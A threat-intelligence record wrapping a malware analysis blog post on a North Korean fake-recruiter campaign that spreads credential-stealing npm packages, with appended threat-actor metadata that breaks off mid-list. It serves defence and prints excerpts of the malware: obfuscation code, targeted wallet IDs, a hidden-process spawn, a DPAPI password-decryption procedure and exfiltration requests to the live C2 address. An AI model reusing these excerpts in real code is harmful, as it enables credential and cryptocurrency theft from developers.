{ "id": "8afaa5c2-24eb-4b7b-a789-8392b63dfef5", "created_at": "2026-04-06T00:12:39.734631Z", "updated_at": "2026-04-10T03:38:19.39735Z", "deleted_at": null, "sha1_hash": "ab7b1e63fa4e254e947ff147cb5f4c8e312cb28e", "title": "Contagious Interview gets an upgrade for 2026 - A comprehensive analysis by OpenSourceMalware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2194614, "plain_text": "Contagious Interview gets an upgrade for 2026 - A comprehensive\r\nanalysis by OpenSourceMalware\r\nBy OpenSourceMalware.com\r\nPublished: 2026-11-20 · Archived: 2026-04-05 15:27:18 UTC\r\nSoftware engineers are still falling prey to fake recruiters who approach them\r\noffering high paying roles\r\n*By: 6mile Date: January 19, 2026\r\nIntroduction: The Package That Started It All\r\nIt started with what looked like an innocuous npm package: tailwindcss-forms-kit . The name seemed\r\nlegitimate enough—Tailwind CSS is a popular utility-first CSS framework, and a package offering pre-built form\r\ncomponents would be exactly the kind of developer productivity tool that gets installed without much scrutiny.\r\nBut this wasn't a helpful utility. It was the opening move in a sophisticated, multi-stage attack orchestrated by\r\nNorth Korean state-sponsored threat actors.\r\nOver the course of my investigation, I would trace this malicious package through three distinct stages of payload\r\ndelivery, each more sophisticated than the last. This is the story of that analysis—a technical narrative of how a\r\nsimple npm install can lead to complete system compromise, cryptocurrency theft, and persistent backdoor\r\naccess for one of the world's most prolific nation-state adversaries.\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 1 of 16\n\nOpenSourceMalware knows Lazarus Group well\r\nOur team has been tracking DPRK malware for years, and we've been researching and analyzing the \"Contagious\r\nInterview\" campaign since it started in 2023. We have written about DPRK campaigns before which you can read\r\nabout on our blog in December 2025, and November 2025. Additionally, we have written deep research on\r\nLazarus Group in our Intelligence library.\r\nAccording to OpenSourceMalware data, we are currently tracking 988 individual threats, and 4285 individual\r\nIOCs attributed to DPRK Lazarus group for \"Contagious Interview\". Of those threats, 405 of them are git\r\nrepositories and 373 of them are NPM packages. That's a lot of data.\r\nStage One: The Initial Infection Vector\r\nDiscovery and Context\r\nThe first stage came to my attention as part of the broader \"Contagious Interview\" campaign—a sustained\r\noperation targeting software developers, particularly those in the cryptocurrency, Web3, and blockchain sectors.\r\nThe attack methodology is insidious in its simplicity: threat actors impersonate recruiters on LinkedIn and other\r\njob platforms, approach developers with enticing opportunities, and during the \"interview process,\" ask candidates\r\nto download and run what appears to be a coding challenge or video conferencing software.\r\nThe tailwindcss-forms-kit package represents one delivery mechanism in this campaign. We are tracking\r\nmultiple distribution mechanisms for Contagious Interview including git repositories, NPM packages and PyPI\r\npackages. The sophistication isn't just in the malware itself—it's in the social engineering that convinces skilled\r\ndevelopers to execute it voluntarily.\r\nThe NPM package\r\nWhen we initially inspected the tailwindcss-forms-kit NPM package it looked innocuous enough:\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 2 of 16\n\nIt purports to be a library that automatically downloads Tailwind artefacts from Cloudflare, Fastly and other\r\nCDNs. Threat actors like Lazarus love packages like this one because the package requires connecting to CDNs\r\nand other HTTP resources. That means it would look unusual when the package makes outbound connections to\r\ndownload stuff.\r\nThe NPM author, intelliverse, has just one package:\r\nTechnical Analysis: JavaScript Obfuscation and the Main Payload\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 3 of 16\n\nNormally, with DPRK packages you have to find, and then deobfuscate complex JavaScript to find the malicious\r\ncode, but in this case it was right out in the open in the index.js file. There was no pre or post-install script in the\r\npackage.json manifest, which means that the threat actors intended this library to get imported and their payload\r\nexecuted that way.\r\nThe index.js file used curl to pull data from https://api[.]npoint[.]io/9d94ec6053e75dbd933e which was a heavily\r\nobfuscated JavaScript file. The obfuscation technique was sophisticated: a 870-element string array containing all\r\nthe malware's strings, referenced through hexadecimal offsets via a lookup function. Every variable name was\r\nmangled with hex prefixes like _0x2d622a , and the initialization code included a self-modifying loop that\r\nshuffled the string array based on mathematical calculations to defeat static analysis.\r\n// Obfuscated lookup pattern observed\r\nfunction _0x1c18(_0xce1eb9, _0x49ac6a) {\r\n const _0xa6dadc = _0xa6da();\r\n return _0x1c18 = function(_0x1c1851, _0x4b3a72) {\r\n _0x1c1851 = _0x1c1851 - 0x19e;\r\n let _0x9b7ba6 = _0xa6dadc[_0x1c1851];\r\n return _0x9b7ba6;\r\n }, _0x1c18(_0xce1eb9, _0x49ac6a);\r\n}\r\nI searched OpenSourceMalware for [https://api[.]npoint[.]io/9d94ec6053e75dbd933e]\r\n(https://opensourcemalware.com/?search=https%3A%2F%2Fapi.npoint.io%2F9d94ec6053e75dbd933e) but it\r\nwasn't being used for any other threat campaigns. However, the npoint.io JSON storage service is very popular\r\nwith DPRK threat actors and there are over a dozen examples in the OSM database just from the last two months.\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 4 of 16\n\nStage Two: Hybrid JavaScript Malware\nDeobfuscating the initial JavaScript payload\nWhen I analyzed the JavaScript payload, I expected either Beavertail or OtterCookie. What I found was a hybrid\nof the two, plus some new stuff. However, I think this is still easily attributable to Lazarus Group, a North Korean\nstate-sponsored APT organization as there were many technical indicators that showed that this was a new,\nupdated DPRK \"Contagious Interview\" campaign. For example:\nAfter spending an hour working with my Claude workflow I was successfully mapping hex offsets to actual\nstrings and reconstructing the control flow, I uncovered the malware's core mission. This wasn't just any\ninformation stealer—it was a multi-platform credential harvester and Remote Access Trojan designed with\nsurgical precision.\nCapabilities: Deconstructing the JavaScript Malware\nThe primary objectives of this second-stage payload were reconnaissance, credential theft, and most importantly,\ndownloading the second stage. Here's what I found it capable of:\nCommand \u0026 Control Infrastructure:\nPrimary C2 server: 95.216[.]37[.]186:5000\nReal-time bidirectional communication via Socket.IO\nWebSocket connections to /client endpoint\nMultiple HTTP endpoints for registration, file upload, and secondary payload downloads\nBrowser Credential Theft: The malware targeted five major browsers—Chrome, Brave, Opera, Yandex, and\nMicrosoft Edge on Windows. But this wasn't simple database copying. On Windows, it implemented full DPAPI\n(Data Protection API) decryption to extract plaintext passwords:\n1. Read the browser's Local State file to extract the encrypted encryption key\n2. Remove the \"DPAPI\" prefix from the base64-decoded key\n3. Use Windows DPAPI ( @primno/dpapi npm package) to decrypt the master key\n4. Copy the browser's Login Data SQLite database to avoid file locks\n5. Query passwords from the database\n6. Decrypt each password using AES-256-GCM with the master key\n7. Export as plaintext to passwords_.txt\nOn macOS, it took a different approach: stealing the entire login.keychain-db file along with browser databases\nand bash history files. On Linux, it grabbed browser databases and shell history. It was opportunistic but at the\nsame time knew what to grab, when.\nCryptocurrency Wallet Targeting: This is where the financial motivation became crystal clear. The malware had\nhardcoded extension IDs for seven cryptocurrency wallet browser extensions:\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\nPage 5 of 16\n\nconst CRYPTO_EXTENSIONS = [\r\n 'nkbihfbeogaeaoehlefnkodbefgpgknn', // MetaMask\r\n 'bfnaelmomeimhlpmgjnjophhpkkoljpa', // Phantom\r\n 'ibnejdfjmmkpcnlpebklmnkoeoihofec', // Coinbase Wallet\r\n 'ejbalbakoplchlghecdalmeeeajnimhm', // MetaMask (alternate)\r\n 'egjidjbpglichdcondbcbdnbeeppgdph', // Trust Wallet\r\n 'acmacodkjbdgmoleebolmdjonilkdbch', // Bitkeep\r\n 'khpkpbbcccdmmclmpigdgddabeilkdpd' // Guarda\r\n];\r\nIt didn't stop at browser extensions. Desktop wallet applications were equally targeted—Exodus, Electrum,\r\nAtomic Wallet, and Guarda. The malware would locate their installation directories, enumerate LevelDB database\r\nfiles, and upload everything to the C2 server.\r\nCloud Credentials: Perhaps most concerning for organizations, the malware automatically uploaded three critical\r\ndirectories on connection:\r\n~/.aws — Amazon Web Services credentials\r\n~/.azure — Microsoft Azure credentials\r\n~/.config/gcloud — Google Cloud credentials\r\nThis meant that any developer with cloud infrastructure access who executed this package had just handed the\r\nkeys to potentially millions of dollars worth of cloud resources to a nation-state adversary.\r\nSensitive File Exfiltration: The malware implemented recursive directory scanning with intelligent filtering. It\r\nsearched for files containing:\r\n.env — Environment variable files (API keys, database passwords)\r\n.json — Configuration files\r\nseed — Cryptocurrency seed phrases\r\nphantom , metamask — Wallet-related files\r\nIt was smart enough to exclude massive directories like node_modules , .cargo , .npm , and .git to speed up\r\nsearching and reduce noise. On Windows, it would scan not just the C: drive but also D: through Z:, looking for\r\nexternally mounted drives or network shares.\r\nRemote Access Capabilities: The Socket.IO connection wasn't just for exfiltration—it provided real-time remote\r\naccess. The malware registered handlers for commands including:\r\nenv — Search for sensitive files across the entire system\r\nimp — Search for \"important\" files (same as env)\r\npat \u003cpattern\u003e — Search for files matching a specific pattern\r\nupload — Execute full credential harvesting operation\r\nexec — Execute arbitrary shell commands\r\ndir — Browse directory contents\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 6 of 16\n\nread_file — Read and return file contents\r\nss_upf \u003cfile\u003e — Upload a single file\r\nss_upd \u003cdirectory\u003e — Upload an entire directory\r\nThe exec command was particularly powerful. It gave the threat actors a full remote shell with special handling\r\nfor cleanup commands and the ability to run anything via child_process.exec() .\r\nPersistence Mechanisms\r\nThe malware wasn't content with a one-time data grab. On Windows, it established persistence via the registry:\r\nRegistry Path: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegistry Key: NvidiaDriverUpdate\r\nThe naming was deliberately deceptive—\"NvidiaDriverUpdate\" mimics legitimate NVIDIA graphics driver\r\nupdate processes that users are accustomed to seeing.\r\nIt also implemented process resurrection: when terminated with SIGINT (Ctrl+C), it would fork a detached child\r\nprocess running server.js before exiting. The new process would continue running independently, providing\r\nresilience against manual termination attempts.\r\nWhat is this malware?\r\nThis wasn't classic Beavertail, and it wasn't OtterCookie. But, what was it? It was clearly a DPRK campaign, as\r\nhad many traits from both malware strains:\r\nSame wallet extensions were targeted\r\nSame exfiltration targets (browser creds, wallet files, macOS keychain, etc)\r\nSame C2 infrastructure (Vercel and npoint)\r\nSame libraries (better-sqlite3, @primno/dpapi, socket.io)\r\nBut this new malware had some new changes:\r\nIt used Nvidia names for its Windows registry keys instead of the typical Node.js keys\r\nThis new version looks for cloud credentials from AWS, Azure and Google Cloud\r\nWe're calling it \"CloudBeaverCookie\". Yes, we know that's ridiculous, but we don't care.\r\nStage Three: InvisibleFerret Revealed\r\nThe Second-Stage Download\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 7 of 16\n\nSo the second stage loader was interesting unto itself, but the most critical function of this stage was downloading\r\nand executing the final payload. The malware made an HTTP GET request to:\r\nURL: http://95.216[.]37[.]186:5000/download-app\r\nHeaders:\r\n X-Client-OS: \u003cwin32|linux|darwin\u003e\r\n X-Client-Arch: \u003cx64|x86|arm64\u003e\r\nBased on the operating system and architecture, it would download a platform-specific executable:\r\nWindows: %TEMP%\\app.exe\r\nLinux: /tmp/app\r\nmacOS: /var/folders/.../app\r\nThe execution was carefully designed for stealth. On Windows:\r\nspawn(OUTPUT_PATH, [], {\r\n detached: true,\r\n stdio: 'ignore',\r\n windowsHide: true, // CRITICAL: No console window\r\n shell: false\r\n});\r\nThe PyInstaller-Compiled Backdoor\r\nLinux Binary: third.stage.payload\r\n- Type: ELF 64-bit LSB executable, x86-64\r\n- Size: 8.4 MB (8,806,400 bytes)\r\n- SHA256: 699cd6c292b8a5933dabee63c74a9a3069ed6432c3433ab945ab46fe816d9e2c\r\nWindows Binary: third.stage.exe\r\n- Type: PE32+ executable (GUI) x86-64\r\n- Size: 8.1 MB (8,493,056 bytes)\r\n- SHA256: 1c8c1a693209c310e9089eb2d5713dc00e8d19f335bde34c68f6e30bccfbe781\r\nThe near-identical file sizes across different platforms immediately suggested these were packaged versions of the\r\nsame codebase. At 8+ MB, they were far too large to be simple native executables—something was embedded.\r\nOn Linux, it used nohup to ensure the process survived terminal disconnection. On macOS, it simply launched\r\ndetached with no console output.\r\nThe timing was interesting too: Windows execution happened 500ms after download completion, while Linux and\r\nmacOS executed after only 100ms. This staggered timing might be a rudimentary anti-sandboxing technique or\r\nsimply operational preference.\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 8 of 16\n\nClient Identification\r\nEach infected machine reported to the C2 with a unique identifier:\r\nClient ID: 0x338 (824 in decimal)\r\nHostname: \u003cos.hostname\u003e:\u003cmachineId_first_6_chars\u003e\r\nThe client ID 0x338 appears to be a campaign or variant identifier. If the hostname was empty, the malware fell\r\nback to the username from os.userInfo().username . This fingerprinting allowed the threat actors to track and\r\nmanage compromised systems.\r\nExfiltration Protocol\r\nData was sent to the C2 server through multiple methods:\r\nMethod 1: Multipart Form Upload\r\nPOST http://95.216[.]37[.]186:5000/file-upload\r\nContent-Type: multipart/form-data\r\nFields:\r\n - username: \u003cvictim-id\u003e\r\n - folderName: \u003ccategory\u003e\r\n - fileName: \u003cfilename\u003e\r\n - filePath: \u003coriginal-path\u003e\r\n - file: \u003cbinary-data\u003e\r\n - client_id: 0x338\r\n - isUpload: true\r\nMethod 2: JSON Content Upload (for text files)\r\nPOST http://95.216[.]37[.]186:5000/content-upload\r\nContent-Type: application/json\r\n{\r\n \"username\": \"\u003cvictim-id\u003e\",\r\n \"folderName\": \"\u003ccategory\u003e\",\r\n \"fileName\": \"\u003cfilename\u003e\",\r\n \"fileContent\": \"\u003ctext-content\u003e\",\r\n \"client_id\": 0x338\r\n}\r\nMethod 3: Secondary Server (for full file system exfiltration)\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 9 of 16\n\nPOST http://95.216[.]37[.]186:3011/file-upload\r\nHeaders:\r\n X-Machine-ID: \u003cmachine-id\u003e\r\n X-File-Path: \u003coriginal-path\u003e\r\n X-File-Size: \u003cbytes\u003e\r\n X-Upload-ID: \u003cunique-id\u003e\r\nBody: \u003cbinary-stream\u003e\r\nThe secondary server on port 3011 was particularly interesting. It implemented a sophisticated upload protocol\r\nwith duplicate detection (checking if files already exist via HTTP HEAD requests to /check ), cleanup on failure\r\n(notifying the server via /cleanup endpoint), and 30-second timeouts per file.\r\nWeb Console is Public\r\nMy favourite part of the hunt is when I find the bad guys infrastructure has been left on the public internet. Sure\r\nenough, the web console for the C2 servers is available at http://95.216[.]37[.]186:3000. When a compromised\r\nserver checks into C2, it will show up here as a compromised asset, and ostensibly the threat actors can control it\r\nfrom here.\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 10 of 16\n\nIt feels like this public exposure of campaign infrastructure is becoming more common. This is the second time\r\nthis week that I've found the web console for a live threat campaign. This is happening more frequently for a few\r\nreasons: first, DPRK threat actors are managing a lot of infrastructure assets, and sometimes they probably just\r\nforget. Iterating through all the GitHub, Vercel, Npoint and other infrastructure is a lot of stuff to manage.\r\nBut what's even worse, I think, is that these threat actors just don't care. A few years ago, they would never have\r\nleft one of these consoles exposed,but now, they don't care about cleaning up after themselves. They have so many\r\nmore, that even if this gets taken down, they have other services to replace it.\r\nWe haven't had time to test this web console yet, but if we do we'll circle back to this blog post and update it.\r\nPyInstaller Discovery\r\nString analysis revealed the truth: these were PyInstaller-compiled Python applications. PyInstaller is a legitimate\r\ntool that bundles Python scripts with the Python interpreter and all dependencies into a single executable. It's\r\npopular among malware authors because:\r\n1. It eliminates the Python installation requirement on target systems\r\n2. It complicates static analysis by embedding compiled bytecode\r\n3. It enables cross-platform distribution from a single Python codebase\r\n4. It provides a layer of obfuscation via encrypted PYZ archives\r\nI found dozens of PyInstaller-specific strings:\r\nCould not load PyInstaller's embedded PKG archive from the executable\r\nPYINSTALLER_SUPPRESS_SPLASH_SCREEN\r\nPYINSTALLER_STRICT_UNPACK_MODE\r\nPYINSTALLER_RESET_ENVIRONMENT\r\npyi-bootloader-ignore-signals\r\nPYZ archive entry not found in the TOC!\r\nThe PYINSTALLER_SUPPRESS_SPLASH_SCREEN variable indicated the malware was configured for stealth mode,\r\npreventing any visual indicators during execution. The PYINSTALLER_RESET_ENVIRONMENT variable suggested\r\nenvironment variable clearing to avoid detection based on environmental fingerprinting.\r\nEmbedded Python 3.10 Runtime\r\nFurther analysis revealed the exact Python version: 3.10. The binaries contained a complete Python 3.10\r\ninterpreter with all standard libraries and compiled extension modules:\r\nlibpython3.10.so.1.0 (Linux)\r\nFailed to set python home path!\r\nFailed to pre-initialize embedded python interpreter!\r\nPyConfig\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 11 of 16\n\nPy_InitializeFromConfig\r\npython3.10/lib-dynload/_asyncio.cpython-310-x86_64-linux-gnu.so\r\n\u003cinsert sandbox data here\u003e\r\nInvisibleFerret Capabilities in Detail\r\nBased on the embedded libraries and MITRE documentation, InvisibleFerret provides:\r\nSystem Reconnaissance:\r\nOS identification, version, architecture\r\nNetwork configuration and IP geolocation (http://ip-api.com/json)\r\nUser enumeration and privilege assessment\r\nProcess discovery to identify security tools and target applications\r\nCredential Harvesting:\r\nBrowser credentials with platform-specific decryption (DPAPI on Windows, Keychain on macOS)\r\nCryptocurrency wallet extensions (MetaMask, Phantom, Trust Wallet, etc.)\r\nDesktop wallet applications (Exodus, Atomic, Electrum)\r\nPassword managers (1Password, LastPass, Bitwarden)\r\nSSH keys ( ~/.ssh/ )\r\nCloud credentials ( ~/.aws/ , ~/.azure/ , ~/.config/gcloud )\r\nEnvironment files ( .env ) containing API keys and secrets\r\nPersistent Surveillance:\r\nSystem-wide keylogging (captures passwords as typed)\r\nClipboard monitoring (can replace cryptocurrency addresses in real-time)\r\nFile system monitoring (immediate exfiltration of new wallet files, SSH keys)\r\nRemote Access:\r\nArbitrary command execution via subprocess\r\nDynamic Python code execution via ast module\r\nAnyDesk deployment for GUI-based remote desktop\r\nFile upload/download with tar/zip packaging\r\nData Exfiltration:\r\nHTTP/HTTPS uploads to /Uploads endpoint\r\nFTP transmission\r\nTelegram Bot API (traffic blends with legitimate Telegram usage)\r\nSocket.IO tunneling through primary C2 channel\r\nPersistence:\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 12 of 16\n\nWindows: Batch files in Startup folder (e.g., queue.bat )\r\nLinux: .desktop files in ~/.config/autostart/\r\nmacOS: LaunchAgent plists in ~/Library/LaunchAgents/\r\nWith all three stages analyzed, I could now map the complete infection sequence:\r\n┌───────────────────────────────────────────────────────\r\n│ STAGE 1: Social Engineering \u0026 Initial Infection │\r\n│ ───────────────────────────────────────────────────────\r\n│ • Fake recruiter contacts developer on LinkedIn │\r\n│ • Multi-round interview process builds trust │\r\n│ • \"Coding challenge\" delivered as npm package │\r\n│ • Developer runs: npm install tailwindcss-forms-kit │\r\n│ • Malicious install script executes obfuscated JavaScript │\r\n└────────────────────────┬──────────────────────────────\r\n │\r\n ▼\r\n┌───────────────────────────────────────────────────────\r\n│ STAGE 2: OtterCookie Deployment \u0026 Credential Theft │\r\n│ ───────────────────────────────────────────────────────\r\n│ • Connects to C2: 95.216.37.186:5000 (Socket.IO) │\r\n│ • Registers with Client ID: 0x338 │\r\n│ • Auto-uploads: ~/.aws, ~/.azure, ~/.config/gcloud │\r\n│ • Downloads stage 3: /download-app (OS-specific binary) │\r\n│ • On command: steals browser passwords (DPAPI decryption) │\r\n│ • On command: steals crypto wallets (7 extensions, 4 apps) │\r\n│ • On command: searches for .env files, seed phrases │\r\n│ • Establishes persistence: NvidiaDriverUpdate registry key │\r\n│ • Maintains remote shell access via Socket.IO │\r\n└────────────────────────┬──────────────────────────────\r\n │\r\n ▼\r\n┌───────────────────────────────────────────────────────\r\n│ STAGE 3: InvisibleFerret Backdoor \u0026 Long-Term Access │\r\n│ ───────────────────────────────────────────────────────\r\n│ • PyInstaller-compiled Python 3.10 backdoor (8+ MB) │\r\n│ • Embedded libraries: Socket.IO, Tornado, evdev, crypto │\r\n│ • System-wide keylogging (evdev on Linux, pyWinhook Windows) │\r\n│ • Clipboard monitoring (crypto address replacement) │\r\n│ • Additional credential theft targeting │\r\n│ • AnyDesk deployment for GUI remote access │\r\n│ • Multi-channel exfiltration: HTTP, FTP, Telegram API │\r\n│ • Persistent surveillance and data collection │\r\n│ • Awaits tasking from DPRK operators │\r\n└───────────────────────────────────────────────────────\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 13 of 16\n\nThe Complete Attack Chain\r\nThe OSM team has been focused on generating attack graphs for software supply chain attacks in a new,\r\ninnovative way: We extract indicators of compromise from the different supply chain attack components and then\r\nmap the these comoponents to their related dependencies. This allows you to see the bigger picture: how supply\r\nchain components like git repos, NPM packages, JSON storage services, and C2 infrastructure map across other\r\nDPRK campaigns.\r\nIn this case you can see how multiple malicious GitHub repositories associated with the DPRK \"contagious\r\ninterview\" campaign use the same type of JSON storage service from npoint.io:\r\nIndicators of Compromise (IOCs)\r\nFile Hashes\r\nStage 3 Linux:\r\nMD5: 5a2c042b086a475dca4c7dcec62693c1\r\nSHA256: 699cd6c292b8a5933dabee63c74a9a3069ed6432c3433ab945ab46fe816d9e2c\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 14 of 16\n\nSize: 8,806,400 bytes\r\nAny.run analysis: https://app.any.run/tasks/33c0a1a2-43a5-4812-8305-77adb7607ec3\r\nStage 3 Windows:\r\nMD5: 153e2f27e035252d5f7ace69948e80b2\r\nSHA256: 1c8c1a693209c310e9089eb2d5713dc00e8d19f335bde34c68f6e30bccfbe781\r\nSize: 8,493,056 bytes\r\nAny.run analysis: https://app.any.run/tasks/71e42942-dd10-44ad-a949-4feced5a0f41\r\nNetwork IOCs\r\nC2 Infrastructure:\r\n95.216.37.186:5000 (primary C2)\r\n95.216.37.186:3011 (secondary exfiltration)\r\n95.164.17.24:1224 (documented InvisibleFerret C2)\r\nHost-Based IOCs\r\nRegistry Keys (Windows):\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\NvidiaDriverUpdate\r\nFile Paths:\r\n%TEMP%\\app.exe (Windows)\r\n/tmp/app (Linux)\r\n~/.config/autostart/*.desktop (Linux persistence)\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\queue.bat (Windows)\r\n~/Library/LaunchAgents/com.avatar.update.wake.plist (macOS)\r\nTargeted Paths:\r\n~/.ssh/* (SSH keys)\r\n~/.aws/credentials (AWS)\r\n~/.azure/* (Azure)\r\n~/.config/gcloud/* (GCP)\r\n**/.env (environment files)\r\nChrome/Brave/Opera/Edge/Yandex User Data directories\r\nReferences\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 15 of 16\n\n1. MITRE ATT\u0026CK S1245 - InvisibleFerret: https://attack.mitre.org/software/S1245/\r\n2. MITRE ATT\u0026CK G1052 - Contagious Interview: https://attack.mitre.org/groups/G1052/\r\n3. Palo Alto Networks Unit 42 (October 2024): \"Contagious Interview: DPRK Threat Actors Lure Tech\r\nIndustry Job Seekers\"\r\n4. GitLab Security (September 2025): \"BeaverTail variant distributed via malicious repositories\"\r\n5. Socket.dev: \"North Korea's Contagious Interview Supply Chain Attack\"\r\n6. ANY.RUN: \"InvisibleFerret and OtterCookie Technical Analysis\"\r\n7. Malpedia: py.invisibleferret, js.beavertail\r\nThis analysis was conducted in an isolated environment without executing malware. All findings are based on\r\nstatic analysis, string extraction, and correlation with published threat intelligence. Stay vigilant, verify recruiter\r\nidentities, and never execute untrusted code—even during job interviews.\r\nSource: https://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nhttps://opensourcemalware.com/blog/contagious-interview-comprehensive\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://opensourcemalware.com/blog/contagious-interview-comprehensive" ], "report_names": [ "contagious-interview-comprehensive" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7", "created_at": "2022-10-25T16:07:23.704358Z", "updated_at": "2026-04-10T02:00:04.718034Z", "deleted_at": null, "main_name": "Harvester", "aliases": [], "source_name": "ETDA:Harvester", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Graphon", "Metasploit", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", 